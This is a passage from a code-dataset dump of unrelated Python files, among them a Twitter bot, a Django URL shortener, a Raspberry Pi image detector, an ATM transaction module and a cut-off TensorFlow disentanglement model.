request.cookies.get('capstoneAuth')\n if not auth_token: # Authtoken no present so send 401\n return Response('Token mancante!\\n' 'Mancano le autorizzazioni per effettuare la chiamata', 401,\n {'WWW-Authenticate': 'Basic realm=\"Login Required\"'})\n else:\n return f(*args, **kwargs)\n return decorated\n\ndef decode_auth_token(token):\n try:\n token = token.replace(\"Bearer \",'')\n message_received = instance.decode(token, signing_key)\n return(message_received)\n except Exception as e:\n return e","sub_path":"jwtlib.py","file_name":"jwtlib.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"395144121","text":"#!/usr/local/bin/python2\n# -*- coding: utf-8 -*-\n\nimport tweepy\nimport myLogging\nfrom myTweetProcessings import getImages, getText\nfrom myImgProcessing import genFromText, writeOnImg, addLogo\nfrom myProjectsProcessing import answerWithInfo\nimport myGlobals\nimport os\nimport urllib\n\nself = \"hdm_bot\" # the bot's name on Twitter without the \"@\"\n\nclass MyStreamListener(tweepy.StreamListener):\n\n def on_status(self, tweet):\n if not tweet.retweeted and tweet.user.screen_name != 'hdm_bot': # ignore retweets and own posts\n # process tweet\n myLogging.writeTweet(tweet)\n tweet_text = unicode(getText(tweet))\n tweet_images = getImages(tweet)\n\n # react to specific hashtags - functionality can be added here easily\n if \"#followme\" in tweet_text.lower():\n myGlobals.api.create_friendship(tweet.user.screen_name)\n if \"ich liebe dich\" in tweet_text.lower():\n myGlobals.api.update_status(\"Oh @\" + tweet.user.screen_name + \"! Auch ich sehne mich nach dir!\")\n myLogging.write(\"(\" + str(tweet.id) + \") @\" + tweet.user.screen_name + \" + @hdm_bot = <3\")\n if \"#projektinfo\" in tweet_text.lower():\n answerWithInfo(tweet_text, tweet.id, tweet.user.screen_name)\n\n # processing images\n if len(tweet_images) > 0:\n myLogging.write(\"(\" + str(tweet.id) + \") processing \" + str(len(tweet_images)) + \" image(s)...\")\n if tweet_text[:9] == \"@hdm_bot \":\n if len(tweet_text.strip('@hdm_bot').strip(' ')) == 0: # \"@hdm_bot\" on the beginning is the only text\n tweet_text = \"Whooop Whooop! Happy Medianight!\" # write some default stuff on picture\n elif len(tweet_text.strip(\"@hdm_bot\").strip(\" \")) > 0: # \"@hdm_bot\" is not the only text\n tweet_text = tweet_text[9:].strip(\" \") # delete @hdm_bot on beginning, keep text\n for i in range(len(tweet_images)):\n picname = \"%s_%i\" % (str(tweet.id), i+1)\n filename = os.path.join(\"./images/\", picname + '.jpg')\n urllib.urlretrieve(tweet_images[i], filename)\n outputFile = writeOnImg(filename, tweet_text)\n outputFile = addLogo(outputFile)\n myLogging.write(\"(\" + str(tweet.id) + \") posting processed image ( \" + outputFile[9:] + \" )\")\n myGlobals.api.update_with_media('%s' % outputFile, '@' + tweet.user.screen_name + ' #medianight #socialbots')\t# post image @user\n\n def on_error(self, status_code):\n if status_code == 420:\t# rate limited\n myLogging.writeSys('ERROR 420: rate limited')\n else:\n myLogging.writeSys('ERROR' + str(status_code))\n return False\n","sub_path":"myStreamListener.py","file_name":"myStreamListener.py","file_ext":"py","file_size_in_byte":2849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"189737372","text":"import hashlib\nimport base64\n\nfrom django.db import models\n\n\nclass TimeStampedModel(models.Model):\n \"\"\"\n Abstract base class that provides self-updating 'created' and 'modified'\n fields.\n \"\"\"\n created = models.DateTimeField(auto_now_add=True)\n modified = models.DateTimeField(auto_now=True)\n\n class Meta:\n abstract = True\n\n\nclass ShortenedUrlManager(models.Manager):\n\n def original_exists(self, url):\n exists = False\n if self.filter(original=url):\n exists = True\n\n return exists\n\n def already_shortened(self, url):\n is_shortened = False\n if self.filter(shortened=url):\n is_shortened = True\n\n return is_shortened\n\n def shorten(self, original_url):\n \"\"\"\n Generates a value to use for the shortened URL that is URL-safe.\n\n Steps:\n 1. Generate an MD5 checksum of the given URL to produce a\n random/unique string/digest.\n 2. Base64-encode the MD5 checksum to create a URL-safe value.\n 3. Strip the '=' sign as it will get in the way of capturing URL\n parameters.\n 4. Take the first 5 characters from the encoded value.\n\n Caveats:\n 1. Collision is possible since we're only taking the first 5\n characters, but it would still take a very large number of records\n before this becomes an issue.\n \"\"\"\n checksum = hashlib.md5(original_url).digest()\n value = base64.urlsafe_b64encode(checksum).strip('=')\n\n return value[:5]\n\n\nclass ShortenedUrl(TimeStampedModel):\n \"\"\"\n Store the original URL provided by the user and the shortened version\n generated by the system.\n \"\"\"\n objects = ShortenedUrlManager()\n\n original = models.URLField(\n unique=True, null=False, blank=False, max_length=5000)\n shortened = models.CharField(\n unique=True, null=False, blank=False, max_length=5000)\n","sub_path":"web/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"248893350","text":"from time import sleep,time\nimport cv2\nimport numpy as np\nimport os\nimport pathlib\nimport picamera\nimport requests\nimport tensorflow as tf\nfrom io import BytesIO\nfrom picamera.array import PiRGBArray\n\n# uploadUrl = \"http://192.168.1.49:3000/api/upload-live\"\nuploadUrl = \"https://manu-cam.vercel.app/api/upload-live\"\n\n# Load the TFLite model and allocate tensors\nmodelPath = str(pathlib.Path(__file__).parent / 'tflite-manu_images_v1' / 'model.tflite')\ninterpreter = tf.lite.Interpreter(model_path=modelPath)\ninterpreter.allocate_tensors()\n\ncamera = picamera.PiCamera()\n\n# camera.rotation = 0\ncamera.resolution = (1024,768)\n\ndef setInputImage(image):\n interpreter.set_tensor(interpreter.get_input_details()[0]['index'], [image])\n\ndef getOutputRects():\n return interpreter.get_tensor(interpreter.get_output_details()[0]['index'])[0]\n\ndef getOutputScores():\n return interpreter.get_tensor(interpreter.get_output_details()[2]['index'])[0]\n\ndef detectManu():\n image = PiRGBArray(camera)\n camera.capture(image, 'bgr')\n image = image.array\n # image = cv2.imread('./test.jpg', cv2.IMREAD_COLOR)\n\n # Resize to tensorflow expected size\n image = cv2.resize(image, (512, 512))\n\n setInputImage(image)\n\n interpreter.invoke()\n\n bestScore = getOutputScores()[0]\n \n bestRect = getOutputRects()[0]\n\n box = {\n 'score': float(bestScore),\n 'x1': float(bestRect[1]),\n 'y1': float(bestRect[0]),\n 'x2': float(bestRect[3]),\n 'y2': float(bestRect[2]),\n }\n\n (_, imageStream) = cv2.imencode('.jpg', image)\n\n return (imageStream, box)\n\nwhile True:\n startTime = time() \n\n # Detect manu\n (imageStream, box) = detectManu()\n \n try:\n res = requests.post(uploadUrl,\n headers={'Authorization': 'Bearer ' + os.environ['MANUCAM_AUTH']},\n files={'image': imageStream},\n data=box)\n try:\n endTime = time()\n print(res.json(), ' [', round(endTime - startTime, 2), 's ]')\n except:\n print(\"Invalid response\")\n print(res.text)\n except Exception as err:\n print(\"Failed to upload image\")\n print(err) \n \n # sleep(2)","sub_path":"manu-ai/live-detect-test.py","file_name":"live-detect-test.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"314117340","text":"#!/usr/bin/python3\nimport pickle\nimport getopt\nimport sys\n\n#serialize\ndef serialize(arrlist, filename):\n f = open (filename, \"wb\")\n pickle.dump(arrlist, f)\n f.close()\n\n#deserialize\ndef deserialize(filename):\n f = open(filename, \"rb\")\n arrlist = pickle.load(f)\n return arrlist\n\n#Response object\nclass Response:\n def __init__(self, http_content_type, http_content_length, tcp_segment_count, file_data, tcp_data_length, tcp_data, frame_no):\n self.http_content_type = http_content_type\n self.http_content_length = http_content_length\n self.tcp_segment_count = tcp_segment_count\n self.file_data = file_data\n self.tcp_data_length = tcp_data_length\n self.tcp_data = tcp_data\n self.frame_no = frame_no\n\n#Request object\nclass Request:\n def __init__(self, host, method, url, accept_encoding, key, value, time, frame_no):\n self.http_method = method\n self.http_uri = url\n self.http_accept_encoding = accept_encoding\n self.http_urlencoded_key = key\n self.http_urlencoded_value = value\n self.frame_time = time\n self.http_host = host\n self.frame_no = frame_no\n\ndef regexURLRefinement(s):\n s = s.replace(\"http://\", \"\")\n s = s.replace(\"https://\", \"\")\n s = s.replace(\"?\", \"\\\\?\")\n s = s.replace(\"$\", \"\\\\$\")\n s = s.replace(\".*\", \"####\")\n s = s.replace(\".\", \"\\\\.\")\n s = s.replace(\"####\", \".*\")\n s = s.replace(\"://\", \"####\")\n s = s.replace(\"//\", \"/\")\n s = s.replace(\"####\", \"://\")\n s = s.replace(\"/\", \"\\\\/\")\n s = s.replace(\"{\", \"\\\\{\")\n s = s.replace(\"}\", \"\\\\}\")\n s = s.replace(\"[\", \"\\\\[\")\n s = s.replace(\"]\", \"\\\\]\")\n\n s = \"^\" + s + \"$\"\n\n return s\n\ndef isValidRegex(r):\n return r != \".*\" and r != \".*.*\" and r != \".*/\"\n\ndef loadsigs(sigfile):\n global sig_list\n global reqIDList\n sig_list = []\n\n f = open(sigfile, 'r')\n while True:\n line = f.readline()\n\n if not line:\n break\n\n originsig = line.split(' ')[1].strip()\n\n if (isValidRegex(originsig)):\n originsig = regexURLRefinement(originsig)\n sig_list.append(originsig.strip())\n\n f.close()\n\n filename = \"./classify/\" + APPID + \"_regex.sigs\"\n f = open(filename, \"w\")\n for i in range(len(sig_list)):\n sig = sig_list[i] + \"\\n\"\n f.write(sig)\n f.close()\n\ndef getReqDumpPath(appName):\n return \"./Dump/\" + appName + \".reqDump\"\n\ndef getRespDumpPath(appName):\n return \"./Dump/\" + appName + \".respDump\"\n\ndef loadDump(appName):\n global request_list\n global response_list\n\n request_list = deserialize(getReqDumpPath(appName))\n response_list = deserialize(getRespDumpPath(appName))\n\nif __name__ == '__main__':\n tid = 0\n matchedcount = 0\n sentcount = 0\n request_list = []\n response_list = []\n DUMP_FILE = None\n APPID = None\n appname = ['flipagram', 'doordash', 'wish', 'accuweather', 'zodiac', 'geek', 'postmates', 'mcdo', 'purple', 'starz']\n\n\n try:\n opts, args = getopt.getopt(sys.argv[1:], \"i:\")\n except getopt.GetoptError:\n print(\"python -i \")\n sys.exit(2)\n \n for opt, arg in opts:\n if opt == \"-i\":\n APPID = arg\n else:\n print(\"python -i -a \")\n sys.exit(2)\n\n print(\"Load signatures ...\")\n loadsigs(\"./classify/\" + APPID + \".sigs\")\n\n print(\"Loading req/resp dumps ...\")\n APP_NAME = appname[int(APPID)-1]\n loadDump(APP_NAME)\n\n print(\"Writing req files ...\")\n for i in range(len(request_list)):\n req = request_list[i]\n req_f = \"./Dump/\" + APP_NAME + \"/req/\"\n filename1 = req_f + \"uri_\" + str(i)\n filename2 = req_f + \"key_\" + str(i)\n filename3 = req_f + \"val_\" + str(i)\n f1 = open(filename1, \"w\")\n f2 = open(filename2, \"w\")\n f3 = open(filename3, \"w\")\n f1.write(req.http_uri)\n f2.write(req.http_urlencoded_key)\n f3.write(req.http_urlencoded_value)\n f1.close()\n f2.close()\n f3.close()\n print(\"Writing resp files ...\")\n for j in range(len(response_list)):\n resp = response_list[j]\n resp_f = \"./Dump/\" + APP_NAME + \"/resp/\"\n filename1 = resp_f + \"http_content_type_\" + str(j)\n filename2 = resp_f + \"file_data_\" + str(j)\n f1 = open(filename1, \"w\")\n f2 = open(filename2, \"w\")\n f1.write(resp.http_content_type)\n f2.write(resp.file_data)\n f1.close()\n f2.close()\n","sub_path":"dump.py","file_name":"dump.py","file_ext":"py","file_size_in_byte":4474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"47512994","text":"from models.base_model import BaseModel\nfrom models.user import User\nfrom flask import flash\nimport peewee as pw\nfrom playhouse.hybrid import hybrid_property\nfrom config import S3_LOCATION, DEFAULT_EVENT_IMAGE\nfrom datetime import datetime, timedelta\n\nclass Event(BaseModel):\n name = pw.CharField(null=False)\n description = pw.CharField(null=True)\n location = pw.CharField(default=\"TBC\")\n host = pw.ForeignKeyField(User, backref='events_hosting')\n time = pw.DateTimeField(null=True)\n event_image = pw.CharField(default=DEFAULT_EVENT_IMAGE)\n # guest = pw.ForeignKeyField(User, backref='events_attending', null=True)\n max_number=pw.IntegerField(default=0)\n private = pw.BooleanField(default = True)\n\n @hybrid_property\n def event_image_url(self):\n return S3_LOCATION + self.event_image\n \n def validate(self):\n #check that event has at least a name\n if self.name=='':\n self.errors.append('Event name cannot be empty')\n \n #check that the event time is at least 1 minute in advance of current time. Might be an issue due to server lag / timeout.\n current_time=datetime.now()\n if self.time!='':\n self.time =datetime.strptime(self.time, \"%Y-%m-%dT%H:%M\") #convert string to datetime object\n # self.time =datetime.strptime(self.time) #convert string to datetime object\n if (self.time - current_time) < timedelta(hours=1):\n self.errors.append('Event has to be in the future')\n else:\n self.time = datetime.now() + timedelta(hours=1)\n ","sub_path":"models/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"279804017","text":"# input() pauses your program and waits for the user to enter information\r\n# after the user enters info, python ties it to a variable to continue working with it\r\n\r\nmessage = input(\"Tell me something and I will repeat it back to you: \")\r\nprint(message)\r\n\r\n# the text inside input() is shown to the user, then after they enter something, it prints that as message\r\n\r\nname = input(\"Please type your full name: \")\r\nprint(f'\\nHello, {name}')\r\n\r\n# if you want to write a multi-line prompt, assign it to a variable and use that as your input message\r\n\r\nprompt = 'If you tell us your first and last name, we can personalize what you see'\r\nprompt += '\\nWhat is your first name?: '\r\n\r\nName = input(prompt)\r\nprint(f'Hello, {Name}!')\r\n\r\n# input() only accepts values entered by the user as string formats\r\n# the int() function converts your input() string to an integer\r\n\r\nage = input('How old are you: ')\r\nage = int(age)\r\nage >= 18\r\n\r\n# input tool using int() to determine what shoe size to wear at your store\r\n\r\nshoe_size = input(\"Please enter your normal shoe size: \")\r\nshoe_size = int(shoe_size)\r\n\r\nif shoe_size > 10:\r\n print('Your suggested shoe size is Large')\r\nelif shoe_size > 4 and shoe_size <= 10:\r\n print('Your suggested shoe size is Medium')\r\nelse:\r\n print('Your suggseted shoe size is Small')\r\n\r\n# modulo operator % will divide numbers and offer the remainder\r\n\r\n4%2\r\n7%2\r\n121%2\r\n\r\nnumber = input('Type any number here: ')\r\nnumber = int(number)\r\n\r\nif number % 2 == 0:\r\n print('the number is even')\r\nelse:\r\n print('the number is odd')\r\n\r\n","sub_path":"python_bootcamp/chapter_7/Input() function.py","file_name":"Input() function.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"174840511","text":"# -*- coding:UTF-8 -*-\nimport os\nimport math\nimport numpy as np\nimport scipy.io as scio\n\ndef get_samples_data(path, trial_list, windows=4, overlapping=3):\n '''\n windows: 划分的时间窗口长度\n overlapping: 时间窗口的重叠长度\n '''\n datas = [] \n labels = []\n data = scio.loadmat(path+\"data1.mat\")\n label = scio.loadmat(path+\"label.mat\")[\"label\"] # shape = (1, 15)\n step = windows - overlapping\n for i in trial_list:\n data_channel = data[\"de_LDS\"+str(i)].transpose((1,0,2))\n data_channel = data_channel.reshape(data_channel.shape[0], -1) # shape = (samples, 310)\n data_label = label[0][i-1] + 1\n numbers_single_trial = int((data_channel.shape[0] - windows) / step + 1)\n for iterator in range(numbers_single_trial):\n datas.append(data_channel[iterator*step:iterator*step + windows,:])\n labels.append(data_label)\n print(\"Get sample data success!\")\n print(\"Total sample number is: \", len(labels))\n print(\"label 0: {} label 1: {} label 2: {}.\".format(np.sum(np.array(labels)==0), \n np.sum(np.array(labels)==1), \n np.sum(np.array(labels)==2)))\n return (datas, labels)\n\ndef index_generator(num_examples, batch_size, seed=0):\n '''此函数用于生成 batch 的索引'''\n np.random.seed(seed)\n permutation = list(np.random.permutation(num_examples))\n num_complete_minibatches = math.floor(num_examples/batch_size)\n for k in range(0, num_complete_minibatches):\n X_batch_index = permutation[k*batch_size:(k+1)*batch_size]\n y_batch_index = permutation[k*batch_size:(k+1)*batch_size]\n yield (X_batch_index, y_batch_index)\n if num_examples % batch_size != 0:\n X_batch_index = permutation[num_complete_minibatches*batch_size:num_examples]\n y_batch_index = permutation[num_complete_minibatches*batch_size:num_examples]\n yield (X_batch_index, y_batch_index)\n\ndef read_data(path=\"../new_RNN/\", trial_list=list(range(1, 16)), windows=9, overlapping=8):\n # datas 和 labels 都是 list. datas 中的每一项是 shape=(32, 128*windows) 的数组\n datas, labels = get_samples_data(path, trial_list, windows, overlapping)\n return (datas, labels)\n","sub_path":"Emotion/model_1th/new_TCN/data_seed.py","file_name":"data_seed.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"113875670","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nSpyder Editor\r\n\r\nThis is a temporary script file.\r\n\"\"\"\r\nimport io\r\nfrom datetime import datetime\r\n\r\n#p\r\ndef Rating_timestamp(in_file_path):\r\n source = io.open(in_file_path, mode=\"r\", encoding=\"utf-8\")\r\n content = source.readlines()\r\n output = open(\"./latest/converted\" + in_file_path[8:-4] + \"_out.txt\", mode=\"w+\",encoding=\"utf-8\")\r\n \r\n for line in content:\r\n line_elements = line.split(\"::\")\r\n output.write(\"^\".join(line_elements[0:3] + [datetime.fromtimestamp(int(line_elements[3])).strftime(\"%d/%m/%Y\")]) + '\\n')\r\n \r\n \r\n output.close()\r\n source.close()\r\n \r\nRating_timestamp(\"./latest/ratings.dat\")\r\n","sub_path":"timestamp.py","file_name":"timestamp.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"138484633","text":"import numpy as np\nimport pandas\nimport os\nfrom collections import Counter\n\ndef get_data_path():\n\t'''\n\treturn the path of the data to load into a numpy array.\n\t'''\n\tparent_path = os.path.pardir\n\tdata_path = parent_path + \"/TripAdvisorChallenge/datathon_tadata.csv\"\n\treturn data_path\n\ndef clean_data():\n\t'''\n\tclean the data to do machine learning.\n\t'''\n\t# print(get_data_path())\n\tdata = pandas.read_csv(get_data_path()).as_matrix()\n\toperating_system_column = data[:, 10]\n\tc = Counter(operating_system_column)\n\tprint(list(c.most_common()))\n\treturn data\n\ndef map_to_matrix():\n\t'''\n\tconsumes an iterable and use collections.Counter to return a matrix of numbers according to the class.\n\n\tExample\n\tinput:\n\t['windows',\n\t'mac',\n\t'linux',\n\t'mac',\n\t'linux',\n\t'linux']\n\n\treturn: an n x m matrix, n being the length of the original iterable and m being the number of unique classes--in this example, n = 6 and m = 3.\n\n\tLet the ith row, jth column element be 1 if the ith element in the input belongs to class j. Otherwise make everything 0.\n\n\tIn this case, let class 0 = linux, class 1 = mac, class 2 = windows.\n\n\tThen the return value should be a numpy matrix as follows:\n\n\t0\t0\t1\n\t0\t1\t0\n\t1\t0\t0\n\t0\t1\t0\n\t1\t0\t0\n\t1\t0\t0\n\t'''\n\nif __name__ == '__main__':\n\tdata = clean_data()\n\t# print(data[0, 1]) # should be 2017-01-10\n","sub_path":"data_clean.py","file_name":"data_clean.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"31953304","text":"#!/usr/bin/env python\n# Author:Zhangmingda\nimport time\nfrom conf import settings\nfrom atm import account,loger\n\ndef trans_action(account_data,trans_type,amount,**kwargs):\n \"\"\"\n :param account_data: 用户详细数据\n :param trans_type: 传输类型\n :param amount: 金额\n :param kwargs: 再说\n :return: 返回存储后的新数据,存储失败返回空\n \"\"\"\n amount = float(amount)\n old_balance = account_data['balance']\n if trans_type in settings.TRANSACTION_TYPE:\n interest = amount * settings.TRANSACTION_TYPE[trans_type]['interest']\n if settings.TRANSACTION_TYPE[trans_type]['action'] == 'plus':\n new_balance = old_balance + amount + interest\n elif settings.TRANSACTION_TYPE[trans_type]['action'] == 'minus':\n new_balance = old_balance - amount - interest\n if new_balance >= 0 :\n account_data['balance'] = new_balance\n now_account_info = account.dump_account(account_data)\n loginfo = time.strftime(\"%Y-%m-%d %H:%M:%S\") + trans_type +\"%s Successful now Balance is %s\\n\" % ( amount, now_account_info['balance'])\n # loger.loger(loginfo)\n return now_account_info\n else:\n print('\\033[31;1m您的余额不足以进行此项交易!!!\\033[0m')\n return\n\ndef trans_action_reciprocal(account_data,trans_type,amount,reciprocal,**kwargs):\n \"\"\"\n :param account_data: 用户详细数据\n :param trans_type: 传输类型\n :param amount: 金额\n :param reciprocal: 对方账户\n :param kwargs: 再说\n :return: 返回存储后的新数据,存储失败返回空\n \"\"\"\n old_balance = account_data['balance']\n now_account_info = trans_action(account_data, trans_type, amount)\n # loginfo = time.strftime(\"%Y-%m-%d %H:%M:%S\") + \"向%s转账%s元 余额%s\\n\" % (reciprocal, amount, now_account_info['balance'])\n # loger.loger(loginfo)\n if now_account_info:\n amount = float(amount)\n reciprocal_account_info = account.load_balance(reciprocal)\n if reciprocal_account_info:\n reciprocal_account_info['balance'] = reciprocal_account_info['balance'] + amount\n trans_result = account.dump_account(reciprocal_account_info)\n if trans_result:\n print(\"\\033[32;1m向对方转账成功\\033[0m\")\n loginfo = time.strftime(\"%Y-%m-%d %H:%M:%S\") + \"向%s转账%s元 余额%s\\n\" % (reciprocal,amount,now_account_info['balance'])\n print(loginfo)\n loger.loger(loginfo)\n return now_account_info\n else:\n print('\\033[31;1m向对方转账失败,资金退回\\033[0m')\n account_data['balance'] = old_balance\n now_account_info = account.dump_account(account_data)\n loginfo = time.strftime(\"%Y-%m-%d %H:%M:%S\") + \"向%s转账%s元失败退回 余额%s\\n\" % (reciprocal, amount, now_account_info['balance'])\n loger.loger(loginfo)\n return now_account_info\n else:\n print('\\033[31;1m操作失败\\033[0m')\n print('old_balance:',old_balance)\n account_data['balance'] = old_balance\n now_account_info = account.dump_account(account_data)\n loginfo = time.strftime(\"%Y-%m-%d %H:%M:%S\") + \"向%s转账%s元失败退回 余额%s\\n\" % (\n reciprocal, amount, now_account_info['balance'])\n loger.loger(loginfo)\n return now_account_info\n else:\n return\n\n\n\n","sub_path":"day4/Atm/atm/trans_action.py","file_name":"trans_action.py","file_ext":"py","file_size_in_byte":3539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"270512959","text":"#! /usr/bin/env python\r\n# -*-coding:Utf-8 -*\r\n\r\n\"\"\"\r\nAUTEUR: SOW THIERNO HAMIDOU\r\nIRC Cleint Chat\r\n1. Ecouter les messages entrants a partir du serveur\r\n2.Verifier l'entrée de l'utilisateur.\r\n\"\"\"\r\nimport socket, select, string, sys\r\n\r\ndef prompt():\r\n\tsys.stdout.write('')\r\n\tsys.stdout.flush()\r\n\r\n\r\nif __name__ == '__main__':\r\n\t\r\n\tif(len(sys.argv) < 3) :\r\n\t\tprint(\"Utilisation : python client_chat.py hostname port\")\r\n\t\tsys.exit()\r\n\r\n\thost = sys.argv[1]\r\n\tport = int(sys.argv[2])\r\n\r\n\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\ts.settimeout(2)\r\n\r\n\t#COnnection a lhost\r\n\ttry:\r\n\t\ts.connect((host, port))\r\n\texcept :\r\n\t\tprint (\"Connection etabli\")\r\n\t\tsys.exit()\r\n\r\n\tprint(\"Connecter a lhost, debut d'envoi des messages\")\r\n\tprompt()\r\n\r\n\twhile 1:\r\n\t\tsocket_list = [sys.stdin, s]\r\n\r\n\t\tread_sockets, write_sockets, error_sockets = select.select(socket_list, [], [],60)\r\n\r\n\t\tfor sock_ready in read_sockets:\r\n\r\n\t\t\tif sock_ready == s:\r\n\t\t\t\tdata = sock_ready.recv(4096)\r\n\t\t\t\tif not data :\r\n\t\t\t\t\tprint(\"\\nDeconnection du chat server\")\r\n\t\t\t\t\tsys.exit()\r\n\t\t\t\telse :\r\n\r\n\t\t\t\t\tsys.stdout.write(data)\r\n\t\t\t\t\tprompt()\r\n\r\n\t\t\telse :\r\n\t\t\t\tmsg = sys.stdin.readline()\r\n\t\t\t\ts.send(msg)\r\n\t\t\t\tprompt()\r\n\r\n\r\n","sub_path":"client_chat.py","file_name":"client_chat.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"642397589","text":"# -*- coding:utf-8 -*-\nimport logging\n\nCONFIG = {\n 'version': 1,\n # 'disable_existing_loggers': False,\n 'root': {\n 'handlers': ['console', 'file', ],\n #'handlers': ['console', ],\n 'level': logging.DEBUG,\n },\n 'loggers': {\n 'googleapiclient': {\n 'handlers': ['console'],\n 'level': logging.WARN,\n 'propagate': False,\n },\n 'oauth2client': {\n 'handlers': ['console'],\n 'level': logging.WARN,\n 'propagate': False,\n }\n },\n 'handlers': {\n 'console': {\n 'class': 'logging.StreamHandler',\n 'level': logging.DEBUG,\n 'formatter': 'standard',\n 'stream': 'ext://sys.stdout',\n },\n 'file': {\n 'class': 'logging.FileHandler',\n 'level': logging.INFO,\n 'formatter': 'standard',\n 'filename': 'logs/python.log',\n #'maxBytes': 10240,\n #'backupCount': 3\n },\n },\n 'formatters': {\n 'standard': {\n 'format': '%(asctime)s - %(levelname)-8s - %(filename)s:%(lineno)d - %(name)s - %(message)s',\n },\n },\n\n}\n","sub_path":"src/module/config/logging.py","file_name":"logging.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"186528613","text":"import os\nimport sys\nfrom PIL import Image\nimport datetime\nsys.path.append(os.path.join(os.path.abspath(os.path.dirname(__file__)), '../..'))\n\nfrom utils.general_class import ModelPlugin\nfrom utils.ortools_op import SolveMaxMatching\nfrom utils.visual_op import matrix_image2big_image\nfrom utils.writer_op import write_pkl, write_gif, write_npy\nfrom utils.tqdm_op import tqdm_range\nfrom utils.eval_op import DisentanglemetricFactorMask, DisentanglemetricFactorJointMask\nfrom utils.np_op import np_softmax\n\nfrom tfops.transform_op import apply_tf_op, apply_tf_op_multi_output, apply_tf_op_multi_input\nfrom tfops.train_op import get_train_op_v2\nfrom tfops.lr_op import DECAY_DICT, DECAY_PARAMS_DICT\nfrom tfops.nets import encoder1_64\nfrom tfops.nets import decoder1_64\nfrom local_nets import disc_net_64, disc_net_64_simple\nfrom tfops.loss import sigmoid_cross_entropy_without_mean, vae_kl_cost_weight\n\nimport tensorflow as tf\nimport numpy as np\n\nclass Model(ModelPlugin):\n def __init__(self, dataset, logfilepath, args):\n super().__init__(dataset, logfilepath, args)\n self.build()\n\n def build(self):\n self.logger.info(\"Model building starts\")\n tf.reset_default_graph()\n tf.set_random_seed(self.args.rseed)\n\n self.input1 = tf.placeholder(tf.float32, shape = [self.args.nbatch, self.height, self.width, self.nchannel])\n self.epsilon_input = tf.placeholder(tf.float32, shape=[self.args.nbatch, self.args.nconti])\n self.objective = tf.placeholder(tf.float32, shape = [self.args.nbatch, self.args.ncat])\n self.istrain = tf.placeholder(tf.bool, shape= [])\n self.I_weight = tf.placeholder(tf.float32, shape = [])\n self.F_weight = tf.placeholder(tf.float32, shape = [])\n\n # For VC-Loss\n self.delta_dim = tf.placeholder(tf.int32, shape=[self.args.nbatch])\n self.objective_2_idx = tf.placeholder(tf.int32, shape = [self.args.nbatch, self.args.ncat])\n\n self.generate_sess()\n\n self.mcf = SolveMaxMatching(nworkers=self.args.nbatch, ntasks=self.args.ncat, k=1, pairwise_lamb=self.args.plamb)\n # Encoding\n self.encoder_net = encoder1_64\n self.decoder_net = decoder1_64\n if self.args.disc_type == 'simple':\n self.disc_net = disc_net_64_simple\n else:\n self.disc_net = disc_net_64\n\n # Continuous rep\n self.mean_total, self.stddev_total = tf.split(self.encoder_net(self.input1, output_dim=2*self.args.nconti, scope='encoder', reuse=False)['output'], num_or_size_splits=2, axis=1)\n self.stddev_total = tf.nn.softplus(self.stddev_total)\n self.z_sample = tf.add(self.mean_total, tf.multiply(self.stddev_total, self.epsilon_input))\n\n # For VC-Loss\n self.z_delta = tf.cast(tf.one_hot(self.delta_dim, self.args.nconti), self.z_sample.dtype)\n rand_eps = tf.random.normal([self.args.nbatch, 1], mean=0.0, stddev=self.args.delta_std)\n self.delta_target = self.z_delta * rand_eps\n self.z_added = self.delta_target\n self.z_added = self.z_added + self.z_sample\n\n self.dec_output_dict = self.decoder_net(z=tf.concat([self.z_sample, self.objective], axis=-1), output_channel=self.nchannel, scope=\"decoder\", reuse=False)\n self.dec_output = self.dec_output_dict['output']\n self.feat_output = self.dec_output_dict['deconv2d2']\n self.F_loss = tf.reduce_mean(self.feat_output * self.feat_output)\n # self.F_loss = self.args.F_beta * self.F_loss\n self.F_loss = 0.\n\n # self.objective_2 = tf.cast(tf.one_hot(self.objective_2_idx, self.args.ncat), self.z_added.dtype)\n self.objective_2 = tf.cast(self.objective_2_idx, self.z_added.dtype)\n self.dec_output_2 = self.decoder_net(z=tf.concat([self.z_added, self.objective_2], axis=-1), output_channel=self.nchannel, scope=\"decoder\", reuse=True)['output']\n self.disc_output = self.disc_net(img1=self.dec_output, img2=self.dec_output_2, target_dim=self.args.nconti, scope='discriminator', reuse=False)['output']\n\n # Loss VC CEloss\n self.disc_prob = tf.nn.softmax(self.disc_output, axis=1)\n self.I_loss = tf.reduce_mean(tf.reduce_sum(self.z_delta * tf.log(self.disc_prob + 1e-12), axis=1))\n self.I_loss = - self.args.C_lambda * self.I_loss\n # Loss VC MSEloss\n # self.I_loss = tf.reduce_mean(tf.reduce_sum((self.disc_output - self.delta_target) ** 2, axis=1))\n # self.I_loss = self.args.C_lambda * self.I_loss\n\n # Unary vector\n self.rec_cost_vector = 